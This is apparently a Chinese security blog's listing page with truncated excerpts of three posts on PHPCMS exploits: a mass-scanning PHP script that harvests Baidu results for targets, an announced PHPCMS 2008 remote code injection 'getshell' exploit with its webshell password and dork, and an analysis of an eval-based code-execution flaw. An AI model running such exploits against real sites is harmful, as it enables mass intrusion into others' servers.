phpcms-exp 0day

分类:安全 | 2012-03-9 | 撸过 917 次
0人扯谈
<?php
error_reporting(E_ERROR);
set_time_limit(0);

$keyword=’inurl:about/joinus’ ; // 批量关键字
$timeout = 1;
$stratpage = 1;
$lastpage = 10000000;
for ($i=$stratpage ; $i<=$lastpage ; $i++ ){
$array=ReadBaiduList($keyword,$timeout,$i);
foreach ($array as $url ){
$url_list=file(‘url.txt’);
if (in[......]

继续阅读

phpcms 2008最新0day加批量EXP

分类:安全 | 2011-11-3 | 撸过 1,191 次
2人扯谈

玩滥了,丢给大家玩吧。现在命中率还不错哦。直接GETSHELL。一句话密码为c

EXP:

#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
PHPCMS Remote Code Inject GetShell Exploit
Google Dork:Powered by Phpcms 2008
code by secr
+-------------------------------------------------[......]

继续阅读

phpcms v9 后台的一个(sql inj)2(code exec)漏洞

分类:安全 | 2011-09-10 | 撸过 438 次
0人扯谈

phpcms v9 中 string2array()函数使用了eval函数,在多个地方可能造成代码执行漏洞

function string2array($data) {

    if($data == '') return array();

    eval("\$array = $data;");

    return $array;

}

比如投票结果统计(需要后台权限)
/moudles/vote/vote.php

/**

     * 投票结果统计

     */

    public function statistics() {

            $s[......]

继续阅读